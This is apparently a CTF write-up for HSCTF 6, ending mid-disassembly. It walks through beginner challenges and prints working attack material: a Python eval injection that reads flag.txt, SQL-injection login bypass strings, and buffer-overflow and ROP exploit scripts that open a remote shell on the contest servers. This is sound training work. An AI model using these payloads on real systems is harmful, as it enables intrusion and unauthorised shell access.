HSCTF 6 Notes

I could only solve the welcome-level challenges and am wrapped in sadness.

Miscellaneous

Discord

Join our Discord server to stay up-to-date on everything!


FLAG : hsctf{hi_welcome_to_discord}

Verbose

My friend sent me this file, but I don't understand what I can do with these 6 different characters...

verbose.txt

verbose.txt is given.

It is obviously JavaScript, so I saved it as a .js file and ran it.

index.html

<script src="script.js"></script>

Running the script redirects you to https://hsctf.com/, so I debugged it in VS Code.

FLAG : hsctf{esoteric_javascript_is_very_verbose}

Admin Pass

Hey guys, found a super cool website at
http://misc.hsctf.com:8001!

Accessing it brings up a page with a password prompt.

For a start I tried entering a password.

There is a GitLab link, and following it gives the source code.

It compares the input against the MD5 hash 6df4c2a41091d8c737db7a44e3d07fb3, but I couldn't crack the hash. I wasted time comparing it against the hashes of rockyou and so on.

Checking the commits, an earlier one still had the password from before it was compared against 6df4c2a41091d8c737db7a44e3d07fb3.

FLAG : hsctf{i_love_richard_stallman_hes_so_cute_8a65926fcdcdac0b}

A Simple Conversation

Someone on the internet wants to talk to you. Can you find out what they want?

nc misc.hsctf.com 9001

talk.py


This is presumably the intended behaviour:

$ nc misc.hsctf.com 9001
Hello!
Hey, can you help me out real quick.
I need to know your age.
What's your age?
> 1
Wow!
Sometimes I wish I was 1
Well, it was nice meeting you, 1-year-old.
Goodbye!

When I gave it sleep, <built-in function sleep> came back. I don't know why.

$ nc misc.hsctf.com 9001
Hello!
Hey, can you help me out real quick.
I need to know your age.
What's your age?
> sleep
Wow!
Sometimes I wish I was <built-in function sleep>
Well, it was nice meeting you, <built-in function sleep>-year-old.
Goodbye!

Since defined functions seem to be usable, I used open() to read flag.txt and read() it.

$ nc misc.hsctf.com 9001
Hello!
Hey, can you help me out real quick.
I need to know your age.
What's your age?
> open('flag.txt','r').read()
Wow!
Sometimes I wish I was hsctf{plz_u5e_pyth0n_3}

Well, it was nice meeting you, hsctf{plz_u5e_pyth0n_3}
-year-old.
Goodbye!

FLAG : hsctf{plz_u5e_pyth0n_3}

Locked Up

My friend gave me a zip file with the flag in it, but the zip file is encrypted. Can you help me open the zip file?

locked.zip

A zip file is given. From the challenge text and so on I thought it was probably a zip-repair kind of problem.

$ file locked.zip 
locked.zip: Zip archive data, at least v1.0 to extract

GitHub - TheZ3ro/zipfix: Fix zip files with broken central directory

$ git clone https://github.com/TheZ3ro/zipfix
Cloning into 'zipfix'...
remote: Enumerating objects: 9, done.
remote: Total 9 (delta 0), reused 0 (delta 0), pack-reused 9
Unpacking objects: 100% (9/9), done.
Checking connectivity... done.
$ python3 zipfix.py ../locked.zip 
Reading ../locked.zip Central Directory
Found 854 file(s) from Central Directory:
- !lBo;!71}c'&!?m$NAtfBLH
- !l^-W~zN>?}i*{jRYG:=X=b:5Hdp7U
- !m9*t0r9Rf%V"
- !_bubre6A{|TB:Q`#X1Vu#Zm<V

(snip)

Found |302h9hPejA%
Found |AaNiHN`@F
Found |A?6osWf:v&,iYo-Ol_][r7xgb1
Found |FT]H;.lP,}|
Found |p}S)_~]A2"
Found |q):;.1SwG#FiF
Found |x7gWJmb@QcNwWhY
Found start of central directory.  All entries processed.

It had been extracted.

$ ls | grep hs
hsctf{w0w_z1ps_ar3nt_th@t_secUr3}
V5-FM[E{obm.%>hs@C|;aG_.

FLAG : hsctf{w0w_z1ps_ar3nt_th@t_secUr3}

Hidden Flag

This image seems wrong.....did Keith lose the key again?

chall.png

It is obviously XORed.

I referred to these:

GitHub - hellman/xortool: A tool to analyze multi-byte xor cipher

Xortool - aldeid

$ xortool chall.png 
The most probable key lengths:
   1:   10.4%
   3:   12.8%
   6:   11.2%
   9:   18.7%
  12:   8.3%
  15:   7.3%
  18:   12.0%
  21:   5.4%
  27:   8.1%
  36:   5.8%
Key-length can be 3*n
Most possible char is needed to guess the key!

$ xortool -l 9 -c 00 chall.png
1 possible key(s) of length 9:
invisible
Found 0 plaintexts with 95.0%+ valid characters
See files filename-key.csv, filename-char_used-perc_valid.csv


FLAG : hsctf{n0t_1nv1s1bl3_an5m0r3?-39547632}
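To make the two xortool steps above concrete, here is a small re-implementation of them: guessing the key length from how skewed each key position's bytes are, then recovering the key under the "most common plaintext byte is 0x00" assumption (xortool's -c 00) and confirming the result against the PNG signature. This is an added example, not the post's code and not xortool itself; the image-like input is constructed, and "invisible" is the key the post recovered.

```python
from collections import Counter
import random

PNG_SIG = bytes.fromhex("89504e470d0a1a0a")


def xor_repeat(data: bytes, key: bytes) -> bytes:
    """XOR data with a repeating key (encrypts and decrypts alike)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def columns(data: bytes, n: int):
    """Split data into n streams, one per key position."""
    return [data[i::n] for i in range(n)]


def length_score(data: bytes, n: int) -> float:
    """Mean, over the n key positions, of the share held by the most common byte.
    At the true length (or a multiple of it) every column is XORed with one key
    byte, so the plaintext's skew (lots of 0x00 in an image) shows through."""
    cols = columns(data, n)
    return sum(Counter(c).most_common(1)[0][1] / len(c) for c in cols) / n


def guess_key_length(data: bytes, max_len: int = 40, tol: float = 0.95) -> int:
    """Smallest length scoring within tol of the best. Multiples of the true
    length score about the same (xortool's "key-length can be 3*n"), so the
    shortest candidate is preferred; tol is an assumption of this example."""
    scores = {n: length_score(data, n) for n in range(1, max_len + 1)}
    best = max(scores.values())
    return min(n for n, s in scores.items() if s >= tol * best)


def recover_key(data: bytes, n: int, most_common_plain: int = 0x00) -> bytes:
    """xortool -c 00: assume the most frequent plaintext byte in each column is
    most_common_plain, so key[i] = most frequent ciphertext byte in column i
    XOR most_common_plain."""
    return bytes(Counter(c).most_common(1)[0][0] ^ most_common_plain
                 for c in columns(data, n))


def analyse(cipher: bytes, magic: bytes = PNG_SIG):
    """Guess the length, recover the key, and confirm the result by checking
    that the decrypted bytes start with the expected file signature."""
    n = guess_key_length(cipher)
    key = recover_key(cipher, n)
    return key, xor_repeat(cipher, key).startswith(magic)


def make_sample(key: bytes = b"invisible", seed: int = 1) -> bytes:
    """Constructed stand-in for chall.png: a PNG signature followed by 9000
    bytes that are mostly 0x00 with 20% random noise, XORed with the key."""
    rng = random.Random(seed)
    body = bytearray(9000)
    for i in range(len(body)):
        if rng.random() < 0.2:
            body[i] = rng.randrange(256)
    return xor_repeat(PNG_SIG + bytes(body), key)


SAMPLE = make_sample()

if __name__ == "__main__":
    key, ok = analyse(SAMPLE)
    print(key, ok)
```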

The Real Reversal

My friend gave me some fancy text, but it was reversed, and so I tried to reverse it but I think I messed it up further. Can you find out what the text says?

reversed.txt


A character-encoding problem. From the challenge text and the file name you can guess that it needs to be reversed.

f = open('reversed.txt', 'rb').read()
reversed_data = f[::-1]
print(reversed_data)

It looks readable if read backwards.

cat reverse | rev > result


FLAG : hsctf{utf8_for_the_win}
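The two-step fix above (bytes reversed with [::-1], then characters reversed with rev) works because a byte-level reversal splits multi-byte UTF-8 sequences while a character-level one does not. The following added example, not code from the original post, builds such a doubly-reversed file from a constructed string and shows that undoing the layers in the right order recovers it.

```python
def reverse_bytes(data: bytes) -> bytes:
    """Apply or undo a byte-level reversal: the post's f[::-1] on the raw file."""
    return data[::-1]


def reverse_chars(text: str) -> str:
    """Apply or undo a character-level reversal: what `rev` does to each line."""
    return text[::-1]


def is_valid_utf8(data: bytes) -> bool:
    """True if the bytes decode as UTF-8; a byte-reversed multi-byte character
    starts with a continuation byte and fails here."""
    try:
        data.decode("utf-8")
        return True
    except UnicodeDecodeError:
        return False


def recover(mangled: bytes) -> str:
    """Undo both layers: the byte reversal first (restoring valid UTF-8),
    then the character reversal."""
    return reverse_chars(reverse_bytes(mangled).decode("utf-8"))


# Constructed sample: ASCII plus one 3-byte character, so the byte-level
# reversal breaks the encoding the way the challenge file was broken.
ORIGINAL = "hsctf{utf8_for_the_win} ✓"
FRIEND_REVERSED = reverse_chars(ORIGINAL)                   # reversed per character
MANGLED = reverse_bytes(FRIEND_REVERSED.encode("utf-8"))   # then reversed per byte

if __name__ == "__main__":
    print(is_valid_utf8(MANGLED))   # False: the bytes of ✓ are now back to front
    print(recover(MANGLED))
```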

Web

Inspect Me

Keith's little brother messed up some things...

https://inspect-me.web.chal.hsctf.com

Note: There are 3 parts to the flag!

Accessing it gives a completely black page.

Looking at the index.html source in the developer tools gives part 1 of the flag.

style.css has part 2 of the flag.

script.js has part 3 of the flag.

FLAG : hsctf{that_was_pretty_easy_right}

Agent Keith

Keith was looking at some old browsers and made a site to hold his flag.

https://agent-keith.web.chal.hsctf.com

Accessing it gives Access Denied.

Looking at the source, it says to set the User-Agent to NCSA_Mosaic/2.0 (Windows 3.1).

<!doctype html>
<html lang="en">
    <head>
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1, viewport-fit=cover">
        <title>agent-keith</title>
        <link rel="stylesheet" href="http://localhost:8002/static/style.css">
    </head>
    <body>
        <main>
            <h2>If you're not Keith, you won't get the flag!</h2>
            <p><b>Your agent is:</b> Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36</p>
            <p><b>Flag:</b> Access Denied</p>
            <!-- DEBUG (remove me!!): NCSA_Mosaic/2.0 (Windows 3.1) -->
        </main>
    </body>
</html>

I set it to NCSA_Mosaic/2.0 (Windows 3.1) with User-Agent Switcher.

FLAG : hsctf{wow_you_are_agent_keith_now}

S-Q-L

Keith keeps trying to keep his flag safe. This time, he used a database and some PHP.

https://s-q-l.web.chal.hsctf.com/

Accessing it shows a login page.

I tried the usual thing.

username : ' or 1=1; --
password : ' or 1=1; --


username : ' or 1=1; #
password : ' or 1=1; #


FLAG : hsctf{mysql_real_escape_string}
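The flag name points at the fix. The added example below (not the challenge's PHP) reproduces the login check with sqlite3 as a string-built query beside its parameterised form, using a constructed users table. The test input is ' OR 1=1 --, since SQLite only accepts the -- comment, whereas MySQL also takes #, which is why the second attempt above worked there.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory users table standing in for the challenge database."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES ('keith', 'correct horse battery staple')")
    return con


def login_vulnerable(con: sqlite3.Connection, username: str, password: str) -> bool:
    """String concatenation: the user's input becomes part of the SQL text, so a
    quote closes the literal and the rest is parsed as SQL."""
    query = ("SELECT COUNT(*) FROM users WHERE username='" + username +
             "' AND password='" + password + "'")
    return con.execute(query).fetchone()[0] > 0


def login_safe(con: sqlite3.Connection, username: str, password: str) -> bool:
    """Placeholders: the driver passes the input as data, never as SQL, so the
    same payload is simply a username that does not exist."""
    query = "SELECT COUNT(*) FROM users WHERE username=? AND password=?"
    return con.execute(query, (username, password)).fetchone()[0] > 0


BYPASS = "' OR 1=1 --"   # constructed test input; see note above on -- vs #

if __name__ == "__main__":
    con = make_db()
    print(login_vulnerable(con, BYPASS, BYPASS))   # True: every row matches
    print(login_safe(con, BYPASS, BYPASS))         # False: no such user
```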

The Quest

You think you are worthy of obtaining the flag? Try your hand at The Quest to Obtain the Flag.

Accessing it gives a Google Form(?).

I figured it was comparing the input somewhere, so I typed in something arbitrary and looked at the source, and the flag was there.

FLAG : hsctf{google_forms_regex_cant_stop_nobody}

Cryptography

Reverse Search Algorithm

WWPHSN students, gotta get these points to boost your grade.

n = 561985565696052620466091856149686893774419565625295691069663316673425409620917583731032457879432617979438142137
e = 65537
c = 3280552792121286168982038099830397087874903846507258907

Just plain RSA.

GitHub - Ganapati/RsaCtfTool: RSA attack tool (mainly for ctf) - retreive private key from weak public key and/or uncipher data

RsaCtfTool (master ?) $ python RsaCtfTool.py -n 561985565696052620466091856149686893774419565625295691069663316673425409620917583731032457879432617979438142137 -e 65537 --uncipher 328055279212128616898203809983039708787490384650725890748576927208883055381430000756624369636820903704775835777

[+] Clear text : hsctf{y3s_rsa_1s_s0lved_10823704961253}

FLAG : hsctf{y3s_rsa_1s_s0lved_10823704961253}

Welcome to Crypto Land

Crypto land is fun! Decrypt:

KZ6UaztNnau6z39oMHUu8UTvdmq1bhob3CcEFdWXRfxJqdUAiNep4pkvkAZUSn9CvEvPNT5r2zt6JPg9bVBPYuTW4xr8v2PuPxVuCT6MLJWDJp84

I decoded it as base58.

KZ6UaztNnau6z39oMHUu8UTvdmq1bhob3CcEFdWXRfxJqdUAiNep4pkvkAZUSn9CvEvPNT5r2zt6JPg9bVBPYuTW4xr8v2PuPxVuCT6MLJWDJp84
Welcome to HSCTF! This is your flag: hsctf{w0w_th1s_1s_my_f1rst_crypt0_chall3ng3?}

FLAG : hsctf{w0w_th1s_1s_my_f1rst_crypt0_chall3ng3?}
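For reference, this is what the base58 decode above actually does: the string is a big-endian base-58 number over the Bitcoin alphabet (no 0, O, I or l), and each leading 1 stands for one 0x00 byte. The dependency-free decoder and encoder below are an added example, not the post's code; the round-trip inputs are constructed, and the challenge string is only decoded in the main block.

```python
ALPHABET = b"123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
INDEX = {c: i for i, c in enumerate(ALPHABET)}


def b58decode(s: str) -> bytes:
    """Decode Base58 text: accumulate the digits as one big integer, then
    prepend one 0x00 byte per leading '1', which the integer cannot carry."""
    value = 0
    for ch in s.encode("ascii"):
        if ch not in INDEX:
            raise ValueError("invalid Base58 character %r" % chr(ch))
        value = value * 58 + INDEX[ch]
    leading = len(s) - len(s.lstrip("1"))
    body = value.to_bytes((value.bit_length() + 7) // 8, "big") if value else b""
    return b"\x00" * leading + body


def b58encode(data: bytes) -> str:
    """Inverse of b58decode, so the decoder can be checked by round-tripping."""
    leading = len(data) - len(data.lstrip(b"\x00"))
    value = int.from_bytes(data, "big")
    digits = bytearray()
    while value:
        value, rem = divmod(value, 58)
        digits.append(ALPHABET[rem])
    return "1" * leading + digits[::-1].decode("ascii")


# The ciphertext from the challenge, as given in the post.
CHALLENGE = ("KZ6UaztNnau6z39oMHUu8UTvdmq1bhob3CcEFdWXRfxJqdUAiNep4pkvkAZUSn9Cv"
             "EvPNT5r2zt6JPg9bVBPYuTW4xr8v2PuPxVuCT6MLJWDJp84")

if __name__ == "__main__":
    print(b58decode(CHALLENGE).decode("utf-8", errors="replace"))
```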

Binary Exploitation

Intro to Netcat

Hey there! This challenge is a quick introduction to netcat and how to use it. Netcat is a program that will help you "talk" with many of our challenges, especially pwn and misc. To begin, Windows users should download this file:
Alternative download that might work
Extract the file, then open a command prompt and navigate to the directory using cd <download-directory>. From there, you can run nc misc.hsctf.com 1111 to get your first flag.

Have fun!

nc.zip is given.
Just nc.
I had installed netcat with cyg-get or something, so I could nc from Windows too.

$ nc misc.hsctf.com 1111
Hey, here's your flag! hsctf{internet_cats}

FLAG : hsctf{internet_cats}

Return to Sender

Who knew the USPS could lose a letter so many times?

nc pwn.hsctf.com 1234

6/3/19 7:34 AM: Updated binary, SHA-1: 104fb76c3318fb44130c4a8ee50ac1a2f52d4082 return-to-sender

return-to-sender
return-to-sender.c

The source and the binary are given.

return-to-sender.c

#define _GNU_SOURCE   /* for setresgid */
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <unistd.h>   /* getegid, setresgid (missing from the listing as posted) */

void win() {
    system("/bin/sh");
}

void vuln() {
    char dest[8];
    printf("Where are you sending your mail to today? ");
    gets(dest);   /* unbounded read into an 8-byte buffer: the intended overflow */
    printf("Alright, to %s it goes!\n", dest);
}

int main() {
    setbuf(stdout, NULL);
    gid_t gid = getegid();
    setresgid(gid,gid,gid);
    vuln();
    return 0;    
}

gets(dest); has a buffer overflow. Jump to win() and you win.

$ file return-to-sender 
return-to-sender: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-, BuildID[sha1]=72ea48b1220887f89f16d20ee21e4d21e1739421, for GNU/Linux 3.2.0, not stripped

$ checksec return-to-sender 
[*] '/home/user/Desktop/CTF/HSCTF 6/Pwn/Return to Sender/return-to-sender'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
gdb-peda$ pattern create 64
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAH'

EIP: 0x41412d41 ('A-AA')

gdb-peda$ pattern offset A-AA
A-AA found at offset: 20
$ (python -c "from pwn import *;print'\x41'* 20 + p32(0x080491b6) + '\n'"; cat) | nc pwn.hsctf.com 1234
Where are you sending your mail to today? Alright, to AAAAAAAAAAAAAAAAAAAA�� it goes!
ls
bin
dev
flag
lib
lib32
lib64
return-to-sender
return-to-sender.c
cat flag
hsctf{fedex_dont_fail_me_now}
^C

As an aside, apparently you can also write it this way.

$ cat <(python -c "from pwn import *;print'\x41'* 20 + p32(0x080491b6) + '\n'";) - | nc pwn.hsctf.com 1234
Where are you sending your mail to today? Alright, to AAAAAAAAAAAAAAAAAAAA�� it goes!
ls
bin
dev
flag
lib
lib32
lib64
return-to-sender
return-to-sender.c
cat flag
hsctf{fedex_dont_fail_me_now}
^C

FLAG : hsctf{fedex_dont_fail_me_now}

Combo Chain Lite

Training wheels!

nc pwn.hsctf.com 3131

combo-chain-lite combo-chain-lite.c

The binary and the source are given.

#define _GNU_SOURCE   /* for setresgid */
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <unistd.h>   /* getegid, setresgid (missing from the listing as posted) */

void vuln() {
    char dest[8];
    printf("Here's your free computer: %p\n", system);
    printf("Dude you hear about that new game called /bin/sh");
    printf("? Enter the right combo for some COMBO CARNAGE!: ");
    gets(dest);   /* unbounded read into an 8-byte buffer: the intended overflow */
}

int main() {
    setbuf(stdout, NULL);
    gid_t gid = getegid();
    setresgid(gid,gid,gid);
    vuln();
    return 0;    
}

$ file combo-chain-lite 
combo-chain-lite: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/l, BuildID[sha1]=c56cc6916b1933494d1cc55ae82dcaf1cdf6693d, for GNU/Linux 3.2.0, not stripped

$ checksec combo-chain-lite 
[*] '/home/user/Desktop/CTF/HSCTF 6/Pwn/Combo Chain Lite/combo-chain-lite'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
gdb-peda$ pattern create 64
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAH'

RSP: 0x7fffffffdd48 ("AACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAH")
RIP: 0x4011be (<vuln+88>: ret)

gdb-peda$ pattern offset AACAA-AA(
AACAA-AA( found at offset: 16

Now that the offset to the return address is known, assemble the ROP chain.

--------------------------------------------
'A' * 16 # buf
--------------------------------------------
pop rdi ; ret  ;
--------------------------------------------
addr_bin_sh # the one used inside the printed string
--------------------------------------------
addr_system # the one the binary leaks
--------------------------------------------

system

$ ./combo-chain-lite 
Here's your free computer: 0x7f37de6d4390 ← this one

addr_bin_sh

0x00402028 : Dude you hear about that new game called /bin/sh
$ echo Dude you hear about that new game called | wc -c
41
bin_sh = 0x00402028 + 41

The string starts at 0x00402028, and /bin/sh begins 41 characters after that.

exploit.py

from pwn import *

def send_payload(payload):
    log.info("payload = %s" % repr(payload))
    r.send(payload)
    return

def sendline_payload(payload):
    log.info("payload = %s" % repr(payload))
    r.sendline(payload)
    return

def print_address(s, addr):
    log.info(s + ' : ' + hex(addr))
    return

binary = './combo-chain-lite'
host ='pwn.hsctf.com'
port = 3131

elf = ELF(binary)
context.binary = binary
# context.log_level = 'debug'

REMOTE = len(sys.argv) >= 2 and sys.argv[1] == 'r'
if REMOTE:
    # remote
    r = remote(host, port)
else:
    # local
    r = process(binary)
    libc = elf.libc

'''
0x00402028 : Dude you hear about that new game called /bin/sh
$ echo Dude you hear about that new game called | wc -c
41
'''

bin_sh = 0x00402028 + 41

data = r.recvline()
addr_system = int(data[-15:], 16)
print_address('addr_system', addr_system)
print r.recvuntil(': ')

'''
Gadget
rp --file combo-chain-lite --unique --rop 5
0x00401273: pop rdi ; ret  ;  (1 found)
'''

payload = ''
payload += 'A' * 16

payload += pack(0x00401273)
payload += pack(bin_sh)
payload += pack(addr_system)

sendline_payload(payload)

r.interactive()

Result:

python exploit.py r
[*] '/home/user/Desktop/CTF/HSCTF 6/Pwn/Combo Chain Lite/combo-chain-lite'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[+] Opening connection to pwn.hsctf.com on port 3131: Done
[*] addr_system : 0x7f2e5533e390
Dude you hear about that new game called /bin/sh? Enter the right combo for some COMBO CARNAGE!: 
[*] payload = 'AAAAAAAAAAAAAAAAs\x12@\x00\x00\x00\x00\x00Q @\x00\x00\x00\x00\x00\x90\xe33U.\x7f\x00\x00'
[*] Switching to interactive mode
$ ls
bin
combo-chain-lite
combo-chain-lite.c
dev
flag
lib
lib32
lib64
$ cat flag
hsctf{wheeeeeee_that_was_fun}
$ 
[*] Interrupted
[*] Closed connection to pwn.hsctf.com port 3131

FLAG : hsctf{wheeeeeee_that_was_fun}

Reversal

A Byte

Just one byte makes all the difference.

a-byte

$ file a-byte 
a-byte: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/l, for GNU/Linux 3.2.0, BuildID[sha1]=88fe0ee8aed1a070d6555c7e9866e364a40f686c, stripped

A binary is given.

$ ./a-byte 
u do not know da wae

Analyse it with radare2.

 r2 a-byte 
 -- OpenBSD might pledge r2 but r2 unveils OpenBSD.
[0x00000630]> aaaa
[x] Analyze all flags starting with sym. and entry0 (aa)
[x] Analyze function calls (aac)
[x] Analyze len bytes of instructions for references (aar)
[x] Enable constraint types analysis for variables
[0x00000630]> afl
0x00000000    2 25           loc.imp._ITM_deregisterTMCloneTable
0x000005b8    3 23           fcn.000005b8
0x000005e0    1 6            sym.imp.puts
0x000005f0    1 6            sym.imp.strlen
0x00000600    1 6            sym.imp.__stack_chk_fail
0x00000610    1 6            sym.imp.strcmp
0x00000620    1 6            fcn.00000620
0x00000630    1 42           entry0
0x00000660    4 50   -> 40   fcn.00000660
0x000006f0    5 58   -> 51   entry.fini0
0x00000730    5 154  -> 67   entry.init0
0x0000073a   14 365          main
[0x00000630]> s main
[0x0000073a]> pdf
/ (fcn) main 365
|   int main (int argc, char **argv, char **envp);
|           ; var int32_t var_50h @ rbp-0x50
|           ; var int32_t var_44h @ rbp-0x44
|           ; var int32_t var_40h @ rbp-0x40
|           ; var int32_t var_3ch @ rbp-0x3c
|           ; var int32_t var_38h @ rbp-0x38
|           ; var int32_t var_30h @ rbp-0x30
|           ; var int32_t var_2fh @ rbp-0x2f
|           ; var int32_t var_2eh @ rbp-0x2e
|           ; var int32_t var_2dh @ rbp-0x2d
|           ; var int32_t var_2ch @ rbp-0x2c
|           ; var int32_t var_2bh @ rbp-0x2b
|           ; var int32_t var_2ah @ rbp-0x2a
|           ; var int32_t var_29h @ rbp-0x29
|           ; var int32_t var_28h @ rbp-0x28
|           ; var int32_t var_27h @ rbp-0x27
|           ; var int32_t var_26h @ rbp-0x26
|           ; var int32_t var_25h @ rbp-0x25
|           ; var int32_t var_24h @ rbp-0x24
|           ; var int32_t var_23h @ rbp-0x23
|           ; var int32_t var_22h @ rbp-0x22
|           ; var int32_t var_21h @ rbp-0x21
|           ; var int32_t var_20h @ rbp-0x20
|           ; var int32_t var_1fh @ rbp-0x1f
|           ; var int32_t var_1eh @ rbp-0x1e
|           ; var int32_t var_1dh @ rbp-0x1d
|           ; var int32_t var_1ch @ rbp-0x1c
|           ; var int32_t var_1bh @ rbp-0x1b
|           ; var int32_t var_1ah @ rbp-0x1a
|           ; var int32_t var_19h @ rbp-0x19
|           ; var int32_t var_18h @ rbp-0x18
|           ; var int32_t var_17h @ rbp-0x17
|           ; var int32_t var_16h @ rbp-0x16
|           ; var int32_t var_15h @ rbp-0x15
|           ; var int32_t var_14h @ rbp-0x14
|           ; var int32_t var_13h @ rbp-0x13
|           ; var int32_t var_12h @ rbp-0x12
|           ; var int32_t var_11h @ rbp-0x11
|           ; var int32_t var_10h @ rbp-0x10
|           ; var int32_t var_fh @ rbp-0xf
|           ; var int32_t var_eh @ rbp-0xe
|           ; var int32_t var_dh @ rbp-0xd
|           ; var int32_t var_8h @ rbp-0x8
|           ; arg int argc @ rdi
|           ; arg char **argv @ rsi
|           ; DATA XREF from entry0 (0x64d)
|           0x0000073a      55             push rbp
|           0x0000073b      4889e5         mov rbp, rsp
|           0x0000073e      4883ec50       sub rsp, 0x50               ; 'P'
|           0x00000742      897dbc         mov dword [var_44h], edi    ; argc
|           0x00000745      488975b0       mov qword [var_50h], rsi    ; argv
|           0x00000749      64488b042528.  mov rax, qword fs:[0x28]    ; [0x28:8]=0x1128 ; '('
|           0x00000752      488945f8       mov qword [var_8h], rax
|           0x00000756      31c0           xor eax, eax
|           0x00000758      837dbc02       cmp dword [var_44h], 2
|       ,=< 0x0000075c      741d           je 0x77b
|       |   0x0000075e      90             nop
|      ,==< 0x0000075f      eb04           jmp 0x765
|      ||   ; CODE XREF from main (0x79a)
|     .---> 0x00000761      90             nop
|    ,====< 0x00000762      eb01           jmp 0x765
|    |:||   ; CODE XREF from main (0x87a)
|   .-----> 0x00000764      90             nop
|   :|:||   ; CODE XREFS from main (0x75f, 0x762)
|   :`-`--> 0x00000765      488d3dc80100.  lea rdi, str.u_do_not_know_da_wae ; 0x934 ; "u do not know da wae"
|   : : |   0x0000076c      e86ffeffff     call sym.imp.puts           ; int puts(const char *s)
|   : : |   0x00000771      b8ffffffff     mov eax, 0xffffffff         ; -1
|   : :,==< 0x00000776      e916010000     jmp 0x891
|   : :||   ; CODE XREF from main (0x75c)
|   : :|`-> 0x0000077b      488b45b0       mov rax, qword [var_50h]
|   : :|    0x0000077f      488b4008       mov rax, qword [rax + 8]    ; [0x8:8]=0
|   : :|    0x00000783      488945c8       mov qword [var_38h], rax
|   : :|    0x00000787      488b45c8       mov rax, qword [var_38h]
|   : :|    0x0000078b      4889c7         mov rdi, rax
|   : :|    0x0000078e      e85dfeffff     call sym.imp.strlen         ; size_t strlen(const char *s)
|   : :|    0x00000793      8945c4         mov dword [var_3ch], eax
|   : :|    0x00000796      837dc423       cmp dword [var_3ch], 0x23   ; '#'
|   : `===< 0x0000079a      75c5           jne 0x761
|   :  |    0x0000079c      c745c0000000.  mov dword [var_40h], 0
|   :  |,=< 0x000007a3      eb28           jmp 0x7cd
|   :  ||   ; CODE XREF from main (0x7d3)
|   : .---> 0x000007a5      8b45c0         mov eax, dword [var_40h]
|   : :||   0x000007a8      4863d0         movsxd rdx, eax
|   : :||   0x000007ab      488b45c8       mov rax, qword [var_38h]
|   : :||   0x000007af      4801d0         add rax, rdx
|   : :||   0x000007b2      0fb608         movzx ecx, byte [rax]
|   : :||   0x000007b5      8b45c0         mov eax, dword [var_40h]
|   : :||   0x000007b8      4863d0         movsxd rdx, eax
|   : :||   0x000007bb      488b45c8       mov rax, qword [var_38h]
|   : :||   0x000007bf      4801d0         add rax, rdx
|   : :||   0x000007c2      83f101         xor ecx, 1
|   : :||   0x000007c5      89ca           mov edx, ecx
|   : :||   0x000007c7      8810           mov byte [rax], dl
|   : :||   0x000007c9      8345c001       add dword [var_40h], 1
|   : :||   ; CODE XREF from main (0x7a3)
|   : :|`-> 0x000007cd      8b45c0         mov eax, dword [var_40h]
|   : :|    0x000007d0      3b45c4         cmp eax, dword [var_3ch]
|   : `===< 0x000007d3      7cd0           jl 0x7a5
|   :  |    0x000007d5      c645d069       mov byte [var_30h], 0x69    ; 'i'
|   :  |    0x000007d9      c645d172       mov byte [var_2fh], 0x72    ; 'r'
|   :  |    0x000007dd      c645d262       mov byte [var_2eh], 0x62    ; 'b'
|   :  |    0x000007e1      c645d375       mov byte [var_2dh], 0x75    ; 'u'
|   :  |    0x000007e5      c645d467       mov byte [var_2ch], 0x67    ; 'g'
|   :  |    0x000007e9      c645d57a       mov byte [var_2bh], 0x7a    ; 'z'
|   :  |    0x000007ed      c645d676       mov byte [var_2ah], 0x76    ; 'v'
|   :  |    0x000007f1      c645d731       mov byte [var_29h], 0x31    ; '1'
|   :  |    0x000007f5      c645d876       mov byte [var_28h], 0x76    ; 'v'
|   :  |    0x000007f9      c645d95e       mov byte [var_27h], 0x5e    ; '^'
|   :  |    0x000007fd      c645da78       mov byte [var_26h], 0x78    ; 'x'
|   :  |    0x00000801      c645db31       mov byte [var_25h], 0x31    ; '1'
|   :  |    0x00000805      c645dc74       mov byte [var_24h], 0x74    ; 't'
|   :  |    0x00000809      c645dd5e       mov byte [var_23h], 0x5e    ; '^'
|   :  |    0x0000080d      c645de6a       mov byte [var_22h], 0x6a    ; 'j'
|   :  |    0x00000811      c645df6f       mov byte [var_21h], 0x6f    ; 'o'
|   :  |    0x00000815      c645e031       mov byte [var_20h], 0x31    ; '1'
|   :  |    0x00000819      c645e176       mov byte [var_1fh], 0x76    ; 'v'
|   :  |    0x0000081d      c645e25e       mov byte [var_1eh], 0x5e    ; '^'
|   :  |    0x00000821      c645e365       mov byte [var_1dh], 0x65    ; 'e'
|   :  |    0x00000825      c645e435       mov byte [var_1ch], 0x35    ; '5'
|   :  |    0x00000829      c645e55e       mov byte [var_1bh], 0x5e    ; '^'
|   :  |    0x0000082d      c645e676       mov byte [var_1ah], 0x76    ; 'v'
|   :  |    0x00000831      c645e740       mov byte [var_19h], 0x40    ; segment.PHDR
|   :  |    0x00000835      c645e832       mov byte [var_18h], 0x32    ; '2'
|   :  |    0x00000839      c645e95e       mov byte [var_17h], 0x5e    ; '^'
